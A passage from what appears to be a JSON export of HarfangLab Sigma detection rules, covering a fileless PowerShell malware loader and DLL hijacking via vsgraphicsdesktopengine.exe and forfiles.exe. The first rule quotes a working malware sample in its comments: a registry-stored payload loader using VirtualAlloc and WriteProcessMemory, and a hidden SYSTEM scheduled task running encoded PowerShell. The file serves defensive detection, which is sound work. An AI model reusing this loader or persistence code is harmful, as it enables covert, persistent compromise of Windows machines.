\"\";for ($bolOl=0; $XF4voR=(Get-ItemProperty -Path \"$VaCs3fdEn\" -Name \"$A89Qc27sM0-$bolOl\" -ErrorAction SilentlyContinue).\"$A89Qc27sM0-$bolOl\"; $bolOl++) {$MIJKw26g += $XF4voR.Trim();}}$sGkh0Zb6n = [System.Convert]::FromBase64String($MIJKw26g);$sGkh0Zb6n[0] = 0;if ([IntPtr]::Size -eq 8) {W3F6u $sGkh0Zb6n 2;} else {W3F6u $sGkh0Zb6n 1;}Stop-Process -Force $PID;\n CommandLine|contains:\n # New-Object System.Reflection.AssemblyName('ReflectedDelegate');\n - 'TgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACgAJwBSAGUAZgBsAGUAYwB0AGUAZABEAGUAbABlAGcAYQB0AGUAJwApADsA'\n - '4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQA7A'\n - 'OAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAKAAnAFIAZQBmAGwAZQBjAHQAZQBkAEQAZQBsAGUAZwBhAHQAZQAnACkAOw'\n\n selection_loader_2:\n CommandLine|contains:\n # .DefineDynamicModule('InMemoryModule',\n - 'LgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACgAJwBJAG4ATQBlAG0AbwByAHkATQBvAGQAdQBsAGUAJwAsACAA'\n - '4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQAoACcASQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlACcALAAgA'\n - 'uAEQAZQBmAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAKAAnAEkAbgBNAGUAbQBvAHIAeQBNAG8AZAB1AGwAZQAnACwAIA'\n\n selection_loader_3:\n CommandLine|contains:\n # {0}IntPtr GetCurrentProcess();{0}IntPtr VirtualAlloc(IntPtr addr, uint size, uint type, uint prot);{0}bool WriteProcessMemory(IntPtr proc, IntPtr addr, byte[] buf, uint size, uint written);{0}uint SetErrorMode(uint mode);\n - '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'\n - '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'\n - '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'\n\n selection_child_1:\n # $dANHP8T = \"\\Microsoft\\Windows\\Diagnosis\\8328329d-db4e-5fe3-d9d7cf43b3599e76\";$c85X2z = 1;$cAQNi = 
\"JABaAGgAUwBrAHgAVwAgAD0AIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFMAaABlAGwAbAAiADsAJABFAEcASABSAFgAZQBsADIAIAA9ACAAIgB7AEEAMQA3ADIANwAyADUAQwAtADAARgA2AEIALQA1AEIAQwAzAC0AOABBADEARAA5ADUANQA3ADMAOAAyADYAMwAwADIANQB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABjAE4ARQBTAFEAaQB7AFAAYQByAGEAbQAoAFsATwB1AHQAcAB1AHQAVAB5AHAAZQAoAFsAVAB5AHAAZQBdACkAXQBbAFAAYQByAGEAbQBlAHQAZQByACgAIABQAG8AcwBpAHQAaQBvAG4AIAA9ACAAMAApAF0AWwBUAHkAcABlAFsAXQBdACQASABmADUAOQBHAGcAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVAB5AHAAZQBbAF0AKAAwACkAKQAsAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACAAKQBdAFsAVAB5AHAAZQBdACQAdABRADkARQBkACAAPQAgAFsAVgBvAGkAZABdACkAJABNAGgAdABXAGIAZwBkAHQAIAA9ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuADsAJABwADAAYgBKAFcARwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AE4AYQBtAGUAKAAnAFIAZQBmAGwAZQBjAHQAZQBkAEQAZQBsAGUAZwBhAHQAZQAnACkAOwAkAFAAagBqAHMASwBhAFUARABlACAAPQAgACQATQBoAHQAVwBiAGcAZAB0AC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkAKAAkAHAAMABiAEoAVwBHACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEUAbQBpAHQALgBBAHMAcwBlAG0AYgBsAHkAQgB1AGkAbABkAGUAcgBBAGMAYwBlAHMAcwBdADoAOgBSAHUAbgApADsAJABnAGwAMwBZAHoASABjAHUAcQBJACAAPQAgACQAUABqAGoAcwBLAGEAVQBEAGUALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACgAJwBJAG4ATQBlAG0AbwByAHkATQBvAGQAdQBsAGUAJwAsACAAJABmAGEAbABzAGUAKQA7ACQAUwB4ADQAMwBWAEIAWABtACAAPQAgACQAZwBsADMAWQB6AEgAYwB1AHEASQAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAIAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkAOwAkAGgAWQAzAEUAdgB1ACAAPQAgACQAUwB4ADQAMwBWAEIAWABtAC4ARABlAGYAaQBuAGUAQwBvAG4AcwB0AHIAdQBjAHQAbwByACgAJwBSAFQAUwBwAGUAYwBpAGEAbABOAGEAbQBlACwAIABIAG
kAZABlAEIAeQBTAGkAZwAsACAAUAB1AGIAbABpAGMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBDAGEAbABsAGkAbgBnAEMAbwBuAHYAZQBuAHQAaQBvAG4AcwBdADoAOgBTAHQAYQBuAGQAYQByAGQALAAgACQASABmADUAOQBHAGcAKQA7ACQAaABZADMARQB2AHUALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7ACQAegBNAGkAQgBPAHAAQwB4ACAAPQAgACQAUwB4ADQAMwBWAEIAWABtAC4ARABlAGYAaQBuAGUATQBlAHQAaABvAGQAKAAnAEkAbgB2AG8AawBlACcALAAgACcAUAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsACcALAAgACQAdABRADkARQBkACwAIAAkAEgAZgA1ADkARwBnACkAOwAkAHoATQBpAEIATwBwAEMAeAAuAFMAZQB0AEkAbQBwAGwAZQBtAGUAbgB0AGEAdABpAG8AbgBGAGwAYQBnAHMAKAAnAFIAdQBuAHQAaQBtAGUALAAgAE0AYQBuAGEAZwBlAGQAJwApADsAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAFMAeAA0ADMAVgBCAFgAbQAuAEMAcgBlAGEAdABlAFQAeQBwAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABOAFUAQQBsAEcAQwBYAHAAZwAoACQAeQBRAEwAcQA0AGwAawBRACwAIAAkAGUAMgBIAGoAYQApACAAewAkAGIARABKAEMAMgBIAHEAWQAgACAAPQAgACQAeQBRAEwAcQA0AGwAawBRAFsAJABlADIASABqAGEAKwAwAF0AIAAqACAAMQA2ADcANwA3ADIAMQA2ADsAJABiAEQASgBDADIASABxAFkAIAArAD0AIAAkAHkAUQBMAHEANABsAGsAUQBbACQAZQAyAEgAagBhACsAMQBdACAAKgAgADYANQA1ADMANgA7ACQAYgBEAEoAQwAyAEgAcQBZACAAKwA9ACAAJAB5AFEATABxADQAbABrAFEAWwAkAGUAMgBIAGoAYQArADIAXQAgACoAIAAyADUANgA7ACQAYgBEAEoAQwAyAEgAcQBZACAAKwA9ACAAJAB5AFEATABxADQAbABrAFEAWwAkAGUAMgBIAGoAYQArADMAXQAgACoAIAAxADsAcgBlAHQAdQByAG4AIAAkAGIARABKAEMAMgBIAHEAWQA7AH0AJABMAE0ARgB6AEIAaABwAGwAYQBlACAAPQAgACIAewAwAH0ASQBuAHQAUAB0AHIAIABHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApADsAewAwAH0ASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAYQBkAGQAcgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB0AHkAcABlACwAIAB1AGkAbgB0ACAAcAByAG8AdAApADsAewAwAH0AYgBvAG8AbAAgAFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABwAHIAbwBjACwAIABJAG4AdABQAHQAcgAgAGEAZABkAHIALAAgAGIAeQB0AGUAWwBdACAAYgB1AGYALAAgAHUAaQBuAHQAIABzAGkAegBlACwAIAB1AGkAbgB0ACAAdwByAGkAdAB0AGUAbgApADsAewAwAH0AdQBpAG4AdAAgAF
MAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAdQBpAG4AdAAgAG0AbwBkAGUAKQA7ACIAIAAtAGYAIAAiAFsARABsAGwASQBtAHAAbwByAHQAKABgACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAYAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAAiADsAJABkAE0ASwBVAGIATgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEwATQBGAHoAQgBoAHAAbABhAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAaQBmACAAKAAhACQAZABNAEsAVQBiAE4AKQAgAHsAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQAgACQAUABJAEQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAEQASwBQAEQATQBLACgAJABMAE0ARgB6AEIAaABwAGwAYQBlACwAIAAkAE0AdgBoAEQANgBUAG4ATwBpAFMALAAgACQAdQBRAFkAMwBUAG4AbQApACAAewAkAEEAWABSADUAWABiAGwAbABVACAAPQAgACQAZABNAEsAVQBiAE4AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwAkAG8ANwBkADYARgBuADEANwA5AGEAIAA9ACAAJABkAE0ASwBVAGIATgA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAJABMAE0ARgB6AEIAaABwAGwAYQBlAC4ATABlAG4AZwB0AGgALAAwAHgAMAAwADAAMAAzADAAMAAwACwAMAB4ADQAMAApADsAJAB6AHEAbwB0AFcAbwBrACAAPQAgACQAZABNAEsAVQBiAE4AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAdQBRAFkAMwBUAG4AbQAuAEwAZQBuAGcAdABoACwAMAB4ADAAMAAwADAAMwAwADAAMAAsADAAeAA0ADAAKQA7ACQAZABNAEsAVQBiAE4AOgA6AFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgAJABBAFgAUgA1AFgAYgBsAGwAVQAsACAAJABvADcAZAA2AEYAbgAxADcAOQBhACwAIAAkAEwATQBGAHoAQgBoAHAAbABhAGUALAAgACQATABNAEYAegBCAGgAcABsAGEAZQAuAEwAZQBuAGcAdABoACwAIAAwACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJABkAE0ASwBVAGIATgA6ADoAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKAAkAEEAWABSADUAWABiAGwAbABVACwAIAAkAHoAcQBvAHQAVwBvAGsALAAgACQAdQBRAFkAMwBUAG4AbQAsACAAJAB1AFEAWQAzAFQAbgBtAC4ATABlAG4AZwB0AGgALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAHMAMwBjAGoAVABoACAAPQAgAFsASQBuAHQAUAB0AHIAXQAoACQAbwA3AGQANgBGAG4AMQA3ADkAYQAuAFQAbwBJAG4AdAA2ADQAKAApACsAJABNAHYAaABEADYAVABuAE8AaQBTACkAOwAkAGcAVAByAGgAVgB6AHoAIAA9ACAAYwBOAEUAUwBRAGkAIABAACgAWwBJAG4AdABQAHQAcgBdACwAIABbAEkAbgB0AFAAdAByAF0AKQAgACgAWwBWAG8AaQBkAF
0AKQA7ACQASQBwAHQAagB4AG8AdQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBHAGUAdABEAGUAbABlAGcAYQB0AGUARgBvAHIARgB1AG4AYwB0AGkAbwBuAFAAbwBpAG4AdABlAHIAKAAkAHMAMwBjAGoAVABoACwAIAAkAGcAVAByAGgAVgB6AHoAKQA7ACQAZABNAEsAVQBiAE4AOgA6AFMAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAMAB4ADgAMAAwADYAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAEkAcAB0AGoAeABvAHUALgBJAG4AdgBvAGsAZQAoACQAegBxAG8AdABXAG8AawAsACAAJABvADcAZAA2AEYAbgAxADcAOQBhACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHEAbABlADMAbQBzAHEAKAAkAGwAbQBJAGoAWQBXAFMAWgAsACAAJABoADUAMQAyAEoAdQA0ADUAKQAgAHsAJABOAEgAMgBTAGQAIAA9ACAATgBVAEEAbABHAEMAWABwAGcAIAAkAGwAbQBJAGoAWQBXAFMAWgAgADEAOwAkAEMAcgB2AHIARQBDACAAPQAgADUAOwB3AGgAaQBsAGUAIAAoACQAQwByAHYAcgBFAEMAKwA4ACAALQBsAHQAIAAkAE4ASAAyAFMAZAApACAAewAkAGQAdAB6AHMAMwA0ADYAWAAgAD0AIAAkAGwAbQBJAGoAWQBXAFMAWgBbACQAQwByAHYAcgBFAEMAXQA7ACQAagBtAEoAVQBrADYAZABGACAAPQAgAE4AVQBBAGwARwBDAFgAcABnACAAJABsAG0ASQBqAFkAVwBTAFoAIAAoACQAQwByAHYAcgBFAEMAKwAxACkAOwAkAHEATwBOAHEATQBaACAAPQAgAE4AVQBBAGwARwBDAFgAcABnACAAJABsAG0ASQBqAFkAVwBTAFoAIAAoACQAQwByAHYAcgBFAEMAKwA1ACkAOwAkAEMAcgB2AHIARQBDACAAKwA9ACAAOQA7AGkAZgAgACgAJABkAHQAegBzADMANAA2AFgAIAAtAGUAcQAgACQAaAA1ADEAMgBKAHUANAA1ACkAIAB7AEQASwBQAEQATQBLACAAJABsAG0ASQBqAFkAVwBTAFoAWwAkAEMAcgB2AHIARQBDAC4ALgAoACQAQwByAHYAcgBFAEMAKwAkAGoAbQBKAFUAawA2AGQARgApAF0AIAAkAHEATwBOAHEATQBaACAAJABsAG0ASQBqAFkAVwBTAFoAOwBiAHIAZQBhAGsAOwB9ACAAZQBsAHMAZQAgAHsAJABDAHIAdgByAEUAQwAgACsAPQAgACQAagBtAEoAVQBrADYAZABGADsAfQB9AH0AJABoAEcAZQAzAFgAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAFoAaABTAGsAeABXACIAIAAtAE4AYQBtAGUAIAAiACQARQBHAEgAUgBYAGUAbAAyACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuACQARQBHAEgAUgBYAGUAbAAyADsAaQBmACAAKAAhACQAaABHAGUAMwBYACkAIAB7ACQAaABHAGUAMwBYACAAPQAgACIAIgA7AGYAbwByACAAKAAkAEMAcgB2AHIARQBDAD0AMAA7ACAAJABrAGwAcgA4AGUAQwBsADIAMgA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIAJABaAGgAUwBrAHgAVwAiAC
AALQBOAGEAbQBlACAAIgAkAEUARwBIAFIAWABlAGwAMgAtACQAQwByAHYAcgBFAEMAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQApAC4AIgAkAEUARwBIAFIAWABlAGwAMgAtACQAQwByAHYAcgBFAEMAIgA7ACAAJABDAHIAdgByAEUAQwArACsAKQAgAHsAJABoAEcAZQAzAFgAIAArAD0AIAAkAGsAbAByADgAZQBDAGwAMgAyAC4AVAByAGkAbQAoACkAOwB9AH0AJABsAG0ASQBqAFkAVwBTAFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABHAGUAMwBYACkAOwAkAGwAbQBJAGoAWQBXAFMAWgBbADAAXQAgAD0AIAAwADsAaQBmACAAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQAgAHsAcQBsAGUAMwBtAHMAcQAgACQAbABtAEkAagBZAFcAUwBaACAAMgA7AH0AIABlAGwAcwBlACAAewBxAGwAZQAzAG0AcwBxACAAJABsAG0ASQBqAFkAVwBTAFoAIAAxADsAfQBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0ARgBvAHIAYwBlACAAJABQAEkARAA7AA==\";$bYW7kz = New-Object -ComObject Schedule.Service;$bYW7kz.Connect();$Uyd3zfK8wH = $bYW7kz.NewTask(0);$Uyd3zfK8wH.Settings.Priority = 6;$Uyd3zfK8wH.Settings.Hidden = $true;$Uyd3zfK8wH.Settings.Enabled = $true;If ($c85X2z -eq 0) {$SSG3IclKIY = $Uyd3zfK8wH.Triggers.Create(8);} ElseIf ($c85X2z -eq 1) {$SSG3IclKIY = $Uyd3zfK8wH.Triggers.Create(1);$SSG3IclKIY.StartBoundary = (Get-Date).ToString(\"s\");$SSG3IclKIY.Repetition.Interval = \"PT2H5M\"}$z1py83At = $Uyd3zfK8wH.Actions.Create(0);$z1py83At.Path = Join-Path $psHome \"PowerShell.exe\";$z1py83At.Arguments = \" -NonInteractive -WindowStyle Hidden -EncodedCommand $cAQNi\";$chrOzZ1S = $bYW7kz.GetFolder(\"\");$chrOzZ1S.RegisterTaskDefinition($dANHP8T,$Uyd3zfK8wH,6,\"SYSTEM\",$null,5,$null);\n CommandLine|contains:\n # New-Object -ComObject Schedule.Service;\n - 'PQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAUwBjAGgAZQBkAHUAbABlAC4AUwBlAHIAdgBpAGMAZQA7A'\n - '0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFMAYwBoAGUAZAB1AGwAZQAuAFMAZQByAHYAaQBjAGUAOw'\n - '9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlADsA'\n\n selection_child_2:\n CommandLine|contains:\n # 
.StartBoundary = (Get-Date).ToString(\"s\");\n - 'LgBTAHQAYQByAHQAQgBvAHUAbgBkAGEAcgB5ACAAPQAgACgARwBlAHQALQBEAGEAdABlACkALgBUAG8AUwB0AHIAaQBuAGcAKAAiAHMAIgApADsA'\n - '4AUwB0AGEAcgB0AEIAbwB1AG4AZABhAHIAeQAgAD0AIAAoAEcAZQB0AC0ARABhAHQAZQApAC4AVABvAFMAdAByAGkAbgBnACgAIgBzACIAKQA7A'\n - 'uAFMAdABhAHIAdABCAG8AdQBuAGQAYQByAHkAIAA9ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAcwAiACkAOw'\n\n selection_child_3:\n CommandLine|contains:\n # -NonInteractive -WindowStyle Hidden -EncodedCommand $\n - 'IAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACQA'\n - 'AALQBOAG8AbgBJAG4AdABlAHIAYQBjAHQAaQB2AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAkA'\n - 'gAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAJA'\n\n condition: selection_powershell and ((all of selection_loader_*) or (all of selection_child_*))\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71c03cb7-362d-4076-95e6-72f3834cdd23",
"rule_name": "Generic Malicious PowerShell Payload Detected",
"rule_description": "Detects suspicious PowerShell command-line arguments used by an unknown fileless malware that reads an additional payload from the registry.\nAdversaries may use encoded PowerShell cmdlets to deploy staged payloads.\nIt is recommended to check for malicious actions by child and parent processes of PowerShell and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2021-12-20",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "721cf2be-8e21-4cb8-88ed-5f813feeee18",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075836Z",
"creation_date": "2026-03-23T11:45:34.075838Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075842Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vsgraphicsdesktopengine.yml",
"content": "title: DLL Hijacking via vsgraphicsdesktopengine.exe\nid: 721cf2be-8e21-4cb8-88ed-5f813feeee18\ndescription: |\n Detects potential Windows DLL Hijacking via vsgraphicsdesktopengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vsgraphicsdesktopengine.exe'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\devobj.dll'\n - '\\version.dll'\n - '\\webservices.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "721cf2be-8e21-4cb8-88ed-5f813feeee18",
"rule_name": "DLL Hijacking via vsgraphicsdesktopengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vsgraphicsdesktopengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "728eca4f-f506-46e0-bd7e-6369503a3ec2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088302Z",
"creation_date": "2026-03-23T11:45:34.088304Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088308Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_forfiles.yml",
"content": "title: DLL Hijacking via forfiles.exe\nid: 728eca4f-f506-46e0-bd7e-6369503a3ec2\ndescription: |\n Detects potential Windows DLL Hijacking via forfiles.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: 